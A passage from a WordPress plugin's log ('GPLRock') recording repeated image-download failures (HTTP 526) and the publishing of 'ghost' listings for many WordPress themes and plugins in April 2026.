cl-team-team-showcase-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:51:18 UTC] GPLRock: Image download failed for product cl-team-team-showcase-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:51:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cl-team---team-showcase-wordpress-plugin-296.webp for product cl-team-team-showcase-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:51:20 UTC] GPLRock WARNING: Image download failed for product cl-team-team-showcase-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/cl-team---team-showcase-wordpress-plugin-296.webp [05-Apr-2026 19:51:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cl-team-team-showcase-wordpress-plugin [05-Apr-2026 19:51:20 UTC] GPLRock: Image download failed for product hotel-booking-system-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:51:23 UTC] GPLRock: Image download failed for product hotel-booking-system-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:51:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hotel-booking-system-for-wordpress-25652.webp for product hotel-booking-system-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:51:25 UTC] GPLRock: Image download failed for product hotel-booking-system-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:51:27 UTC] GPLRock: Image download failed for product hotel-booking-system-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:51:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hotel-booking-system-for-wordpress-25652.webp for product hotel-booking-system-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:51:29 UTC] GPLRock WARNING: Image download failed for product hotel-booking-system-for-wordpress. URL: https://meldwp.com/wp-content/uploads/hotel-booking-system-for-wordpress-25652.webp [05-Apr-2026 19:51:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hotel-booking-system-for-wordpress [05-Apr-2026 19:51:29 UTC] GPLRock: Image download failed for product woocommerce-zoomifier (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:51:31 UTC] GPLRock: Image download failed for product woocommerce-zoomifier (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:51:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-zoomifier-21935.webp for product woocommerce-zoomifier after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:51:34 UTC] GPLRock: Image download failed for product woocommerce-zoomifier (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:51:36 UTC] GPLRock: Image download failed for product woocommerce-zoomifier (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:51:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-zoomifier-21935.webp for product woocommerce-zoomifier after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:51:38 UTC] GPLRock WARNING: Image download failed for product woocommerce-zoomifier. URL: https://meldwp.com/wp-content/uploads/woocommerce-zoomifier-21935.webp [05-Apr-2026 19:51:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-zoomifier [05-Apr-2026 19:51:38 UTC] GPLRock: Image download failed for product progress-ads-wordpress-skippable-ads-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:51:40 UTC] GPLRock: Image download failed for product progress-ads-wordpress-skippable-ads-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:51:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/progress-ads---wordpress-skippable-ads-plugin-21217.webp for product progress-ads-wordpress-skippable-ads-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:51:42 UTC] GPLRock: Image download failed for product progress-ads-wordpress-skippable-ads-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:51:44 UTC] GPLRock: Image download failed for product progress-ads-wordpress-skippable-ads-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:51:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/progress-ads---wordpress-skippable-ads-plugin-21217.webp for product progress-ads-wordpress-skippable-ads-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:51:46 UTC] GPLRock WARNING: Image download failed for product progress-ads-wordpress-skippable-ads-plugin. URL: https://meldwp.com/wp-content/uploads/progress-ads---wordpress-skippable-ads-plugin-21217.webp [05-Apr-2026 19:51:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: progress-ads-wordpress-skippable-ads-plugin [05-Apr-2026 19:51:47 UTC] GPLRock: Image download failed for product wordpress-posts-woocommerce-products-scheduler-restrict-access (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:51:49 UTC] GPLRock: Image download failed for product wordpress-posts-woocommerce-products-scheduler-restrict-access (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:51:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-posts--woocommerce-products-scheduler--restrict-access-29574.webp for product wordpress-posts-woocommerce-products-scheduler-restrict-access after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:51:51 UTC] GPLRock: Image download failed for product wordpress-posts-woocommerce-products-scheduler-restrict-access (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:51:53 UTC] GPLRock: Image download failed for product wordpress-posts-woocommerce-products-scheduler-restrict-access (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:51:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-posts--woocommerce-products-scheduler--restrict-access-29574.webp for product wordpress-posts-woocommerce-products-scheduler-restrict-access after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:51:55 UTC] GPLRock WARNING: Image download failed for product wordpress-posts-woocommerce-products-scheduler-restrict-access. URL: https://meldwp.com/wp-content/uploads/wordpress-posts--woocommerce-products-scheduler--restrict-access-29574.webp [05-Apr-2026 19:51:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wordpress-posts-woocommerce-products-scheduler-restrict-access [05-Apr-2026 19:51:55 UTC] GPLRock: Image download failed for product bulk-spreadsheet-product-manager-for-woocommerce-and-wp-e-commerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:51:57 UTC] GPLRock: Image download failed for product bulk-spreadsheet-product-manager-for-woocommerce-and-wp-e-commerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:51:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bulk-spreadsheet-product-manager-for-woocommerce-and-wp-e-commerce-26748.webp for product bulk-spreadsheet-product-manager-for-woocommerce-and-wp-e-commerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:51:59 UTC] GPLRock: Image download failed for product bulk-spreadsheet-product-manager-for-woocommerce-and-wp-e-commerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:52:02 UTC] GPLRock: Image download failed for product bulk-spreadsheet-product-manager-for-woocommerce-and-wp-e-commerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:52:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bulk-spreadsheet-product-manager-for-woocommerce-and-wp-e-commerce-26748.webp for product bulk-spreadsheet-product-manager-for-woocommerce-and-wp-e-commerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:52:04 UTC] GPLRock WARNING: Image download failed for product bulk-spreadsheet-product-manager-for-woocommerce-and-wp-e-commerce. URL: https://meldwp.com/wp-content/uploads/bulk-spreadsheet-product-manager-for-woocommerce-and-wp-e-commerce-26748.webp [05-Apr-2026 19:52:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bulk-spreadsheet-product-manager-for-woocommerce-and-wp-e-commerce [05-Apr-2026 19:52:39 UTC] GPLRock: Image downloaded successfully for product arkhitekton-modern-architecture-and-interior-design-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-556f52a7.png [05-Apr-2026 19:52:39 UTC] GPLRock: Using pre-downloaded image for product arkhitekton-modern-architecture-and-interior-design-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-556f52a7.png [05-Apr-2026 19:52:39 UTC] GPLRock: Ghost product published with image - Product ID: arkhitekton-modern-architecture-and-interior-design-wordpress-theme [05-Apr-2026 19:52:41 UTC] GPLRock: Image downloaded successfully for product jannal-windows-curtains-doors-service-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-031399fe.png [05-Apr-2026 19:52:41 UTC] GPLRock: Using pre-downloaded image for product jannal-windows-curtains-doors-service-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-031399fe.png [05-Apr-2026 19:52:41 UTC] GPLRock: Ghost product published with image - Product ID: jannal-windows-curtains-doors-service-wordpress-theme [05-Apr-2026 19:52:43 UTC] GPLRock: Image downloaded successfully for product gravity-forms-disable-entry-creation (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7ba03968.jpg [05-Apr-2026 19:52:43 UTC] GPLRock: Using pre-downloaded image for product gravity-forms-disable-entry-creation: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7ba03968.jpg [05-Apr-2026 19:52:43 UTC] GPLRock: Ghost product published with image - Product ID: gravity-forms-disable-entry-creation [05-Apr-2026 19:52:45 UTC] GPLRock: Image downloaded successfully for product listivo-classified-ads-directory (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4e7b6d4e.jpg [05-Apr-2026 19:52:45 UTC] GPLRock: Using pre-downloaded image for product listivo-classified-ads-directory: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4e7b6d4e.jpg [05-Apr-2026 19:52:45 UTC] GPLRock: Ghost product published with image - Product ID: listivo-classified-ads-directory [05-Apr-2026 19:52:46 UTC] GPLRock: Image downloaded successfully for product avas-elementor-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d362ebe9.jpg [05-Apr-2026 19:52:46 UTC] GPLRock: Using pre-downloaded image for product avas-elementor-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d362ebe9.jpg [05-Apr-2026 19:52:46 UTC] GPLRock: Ghost product published with image - Product ID: avas-elementor-wordpress-theme [05-Apr-2026 19:52:48 UTC] GPLRock: Image downloaded successfully for product flexible-checkout-fields-pro-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-37f17744.jpg [05-Apr-2026 19:52:48 UTC] GPLRock: Using pre-downloaded image for product flexible-checkout-fields-pro-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-37f17744.jpg [05-Apr-2026 19:52:48 UTC] GPLRock: Ghost product published with image - Product ID: flexible-checkout-fields-pro-woocommerce [05-Apr-2026 19:52:50 UTC] GPLRock: Image downloaded successfully for product smart-image-resize-pro-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-41d94898.jpg [05-Apr-2026 19:52:50 UTC] GPLRock: Using pre-downloaded image for product smart-image-resize-pro-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-41d94898.jpg [05-Apr-2026 19:52:50 UTC] GPLRock: Ghost product published with image - Product ID: smart-image-resize-pro-for-woocommerce [05-Apr-2026 19:52:51 UTC] GPLRock: Image downloaded successfully for product maxcoach-online-courses-personal-coaching-education-wp-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-226fa297.jpg [05-Apr-2026 19:52:51 UTC] GPLRock: Using pre-downloaded image for product maxcoach-online-courses-personal-coaching-education-wp-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-226fa297.jpg [05-Apr-2026 19:52:51 UTC] GPLRock: Ghost product published with image - Product ID: maxcoach-online-courses-personal-coaching-education-wp-theme [05-Apr-2026 19:52:53 UTC] GPLRock: Image downloaded successfully for product hub-responsive-multi-purpose-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f6d36d29.jpg [05-Apr-2026 19:52:53 UTC] GPLRock: Using pre-downloaded image for product hub-responsive-multi-purpose-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f6d36d29.jpg [05-Apr-2026 19:52:53 UTC] GPLRock: Ghost product published with image - Product ID: hub-responsive-multi-purpose-wordpress-theme [05-Apr-2026 19:52:55 UTC] GPLRock: Image downloaded successfully for product event-espresso-core-events-registration-and-ticketing (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7ac32eb5.jpg [05-Apr-2026 19:52:55 UTC] GPLRock: Using pre-downloaded image for product event-espresso-core-events-registration-and-ticketing: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7ac32eb5.jpg [05-Apr-2026 19:52:55 UTC] GPLRock: Ghost product published with image - Product ID: event-espresso-core-events-registration-and-ticketing [05-Apr-2026 19:55:33 UTC] GPLRock: Image download failed for product hr-advisor-human-resources-recruiting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:55:35 UTC] GPLRock: Image download failed for product hr-advisor-human-resources-recruiting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:55:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hr-advisor--human-resources--recruiting-wordpress-theme-13093.webp for product hr-advisor-human-resources-recruiting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:55:38 UTC] GPLRock: Image download failed for product hr-advisor-human-resources-recruiting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:55:40 UTC] GPLRock: Image download failed for product hr-advisor-human-resources-recruiting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:55:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hr-advisor--human-resources--recruiting-wordpress-theme-13093.webp for product hr-advisor-human-resources-recruiting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:55:42 UTC] GPLRock WARNING: Image download failed for product hr-advisor-human-resources-recruiting-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/hr-advisor--human-resources--recruiting-wordpress-theme-13093.webp [05-Apr-2026 19:55:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hr-advisor-human-resources-recruiting-wordpress-theme [05-Apr-2026 19:55:42 UTC] GPLRock: Image download failed for product saaspro-startup-saas-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:55:44 UTC] GPLRock: Image download failed for product saaspro-startup-saas-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:55:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/saaspro---startup--saas-wordpress-theme-880.webp for product saaspro-startup-saas-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:55:46 UTC] GPLRock: Image download failed for product saaspro-startup-saas-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:55:48 UTC] GPLRock: Image download failed for product saaspro-startup-saas-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:55:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/saaspro---startup--saas-wordpress-theme-880.webp for product saaspro-startup-saas-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:55:50 UTC] GPLRock WARNING: Image download failed for product saaspro-startup-saas-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/saaspro---startup--saas-wordpress-theme-880.webp [05-Apr-2026 19:55:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: saaspro-startup-saas-wordpress-theme [05-Apr-2026 19:55:51 UTC] GPLRock: Image download failed for product maruthi-fitness-gym-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:55:53 UTC] GPLRock: Image download failed for product maruthi-fitness-gym-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:55:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/maruthi---fitness-gym-wordpress-theme-22277.webp for product maruthi-fitness-gym-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:55:55 UTC] GPLRock: Image download failed for product maruthi-fitness-gym-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:55:57 UTC] GPLRock: Image download failed for product maruthi-fitness-gym-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:55:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/maruthi---fitness-gym-wordpress-theme-22277.webp for product maruthi-fitness-gym-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:55:59 UTC] GPLRock WARNING: Image download failed for product maruthi-fitness-gym-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/maruthi---fitness-gym-wordpress-theme-22277.webp [05-Apr-2026 19:55:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: maruthi-fitness-gym-wordpress-theme [05-Apr-2026 19:55:59 UTC] GPLRock: Image download failed for product freestyle-a-wordpress-theme-for-extreme-sports (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:56:01 UTC] GPLRock: Image download failed for product freestyle-a-wordpress-theme-for-extreme-sports (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:56:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/freestyle---a-wordpress-theme-for-extreme-sports-16414.webp for product freestyle-a-wordpress-theme-for-extreme-sports after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:56:04 UTC] GPLRock: Image download failed for product freestyle-a-wordpress-theme-for-extreme-sports (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:56:06 UTC] GPLRock: Image download failed for product freestyle-a-wordpress-theme-for-extreme-sports (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:56:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/freestyle---a-wordpress-theme-for-extreme-sports-16414.webp for product freestyle-a-wordpress-theme-for-extreme-sports after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:56:08 UTC] GPLRock WARNING: Image download failed for product freestyle-a-wordpress-theme-for-extreme-sports. URL: https://meldwp.com/wp-content/uploads/freestyle---a-wordpress-theme-for-extreme-sports-16414.webp [05-Apr-2026 19:56:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: freestyle-a-wordpress-theme-for-extreme-sports [05-Apr-2026 19:56:08 UTC] GPLRock: Image download failed for product teeno-app-landing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:56:10 UTC] GPLRock: Image download failed for product teeno-app-landing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:56:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/teeno---app-landing-wordpress-theme-6140.webp for product teeno-app-landing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:56:12 UTC] GPLRock: Image download failed for product teeno-app-landing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:56:14 UTC] GPLRock: Image download failed for product teeno-app-landing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:56:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/teeno---app-landing-wordpress-theme-6140.webp for product teeno-app-landing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:56:16 UTC] GPLRock WARNING: Image download failed for product teeno-app-landing-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/teeno---app-landing-wordpress-theme-6140.webp [05-Apr-2026 19:56:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: teeno-app-landing-wordpress-theme [05-Apr-2026 19:56:17 UTC] GPLRock: Image download failed for product motors-car-dealer-rental-listing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:56:19 UTC] GPLRock: Image download failed for product motors-car-dealer-rental-listing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:56:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/motors---car-dealer-rental--listing-wordpress-theme-14200.webp for product motors-car-dealer-rental-listing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:56:21 UTC] GPLRock: Image download failed for product motors-car-dealer-rental-listing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:56:23 UTC] GPLRock: Image download failed for product motors-car-dealer-rental-listing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:56:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/motors---car-dealer-rental--listing-wordpress-theme-14200.webp for product motors-car-dealer-rental-listing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:56:25 UTC] GPLRock WARNING: Image download failed for product motors-car-dealer-rental-listing-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/motors---car-dealer-rental--listing-wordpress-theme-14200.webp [05-Apr-2026 19:56:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: motors-car-dealer-rental-listing-wordpress-theme [05-Apr-2026 19:56:25 UTC] GPLRock: Image download failed for product light-minimalist-wordpress-portfolio-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:56:27 UTC] GPLRock: Image download failed for product light-minimalist-wordpress-portfolio-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:56:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/light---minimalist-wordpress-portfolio-theme-28252.webp for product light-minimalist-wordpress-portfolio-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:56:30 UTC] GPLRock: Image download failed for product light-minimalist-wordpress-portfolio-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:56:32 UTC] GPLRock: Image download failed for product light-minimalist-wordpress-portfolio-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:56:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/light---minimalist-wordpress-portfolio-theme-28252.webp for product light-minimalist-wordpress-portfolio-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:56:34 UTC] GPLRock WARNING: Image download failed for product light-minimalist-wordpress-portfolio-theme. URL: https://meldwp.com/wp-content/uploads/light---minimalist-wordpress-portfolio-theme-28252.webp [05-Apr-2026 19:56:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: light-minimalist-wordpress-portfolio-theme [05-Apr-2026 19:56:34 UTC] GPLRock: Image downloaded successfully for product groser-grocery-store-woocommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-09927351.webp [05-Apr-2026 19:56:34 UTC] GPLRock: Using pre-downloaded image for product groser-grocery-store-woocommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-09927351.webp [05-Apr-2026 19:56:34 UTC] GPLRock: Ghost product published with image - Product ID: groser-grocery-store-woocommerce-wordpress-theme [05-Apr-2026 19:56:34 UTC] GPLRock: Image download failed for product sativaka-medical-marijuana-dispensary-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:56:36 UTC] GPLRock: Image download failed for product sativaka-medical-marijuana-dispensary-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:56:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sativaka---medical-marijuana-dispensary-wordpress-23807.webp for product sativaka-medical-marijuana-dispensary-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:56:39 UTC] GPLRock: Image download failed for product sativaka-medical-marijuana-dispensary-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:56:41 UTC] GPLRock: Image download failed for product sativaka-medical-marijuana-dispensary-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 19:56:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sativaka---medical-marijuana-dispensary-wordpress-23807.webp for product sativaka-medical-marijuana-dispensary-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 19:56:43 UTC] GPLRock WARNING: Image download failed for product sativaka-medical-marijuana-dispensary-wordpress. URL: https://meldwp.com/wp-content/uploads/sativaka---medical-marijuana-dispensary-wordpress-23807.webp [05-Apr-2026 19:56:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sativaka-medical-marijuana-dispensary-wordpress [05-Apr-2026 19:56:43 UTC] GPLRock: Image downloaded successfully for product dentalux-dentist-medical-healthcare-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-302593a9.webp [05-Apr-2026 19:56:43 UTC] GPLRock: Using pre-downloaded image for product dentalux-dentist-medical-healthcare-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-302593a9.webp [05-Apr-2026 19:56:43 UTC] GPLRock: Ghost product published with image - Product ID: dentalux-dentist-medical-healthcare-wordpress-theme [05-Apr-2026 19:57:25 UTC] GPLRock: Image downloaded successfully for product pageloader-loading-screen-and-progress-bar-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f84e8ed2.jpg [05-Apr-2026 19:57:25 UTC] GPLRock: Using pre-downloaded image for product pageloader-loading-screen-and-progress-bar-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f84e8ed2.jpg [05-Apr-2026 19:57:25 UTC] GPLRock: Ghost product published with image - Product ID: pageloader-loading-screen-and-progress-bar-for-wordpress [05-Apr-2026 19:57:27 UTC] GPLRock: Image downloaded successfully for product ultimate-reviewer-wordpress-plugin-for-wpbakery-page-builder (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-afa24f51.jpg [05-Apr-2026 19:57:27 UTC] GPLRock: Using pre-downloaded image for product ultimate-reviewer-wordpress-plugin-for-wpbakery-page-builder: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-afa24f51.jpg [05-Apr-2026 19:57:27 UTC] GPLRock: Ghost product published with image - Product ID: ultimate-reviewer-wordpress-plugin-for-wpbakery-page-builder [05-Apr-2026 19:57:29 UTC] GPLRock: Image downloaded successfully for product ananke-one-page-parallax-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-16190305.jpg [05-Apr-2026 19:57:29 UTC] GPLRock: Using pre-downloaded image for product ananke-one-page-parallax-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-16190305.jpg [05-Apr-2026 19:57:29 UTC] GPLRock: Ghost product published with image - Product ID: ananke-one-page-parallax-wordpress-theme [05-Apr-2026 19:57:30 UTC] GPLRock: Image downloaded successfully for product shopme-multi-vendor-woocommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0191b45f.jpg [05-Apr-2026 19:57:30 UTC] GPLRock: Using pre-downloaded image for product shopme-multi-vendor-woocommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0191b45f.jpg [05-Apr-2026 19:57:30 UTC] GPLRock: Ghost product published with image - Product ID: shopme-multi-vendor-woocommerce-wordpress-theme [05-Apr-2026 19:57:32 UTC] GPLRock: Image downloaded successfully for product wp-job-manager-listing-payments (attempt 1) to: 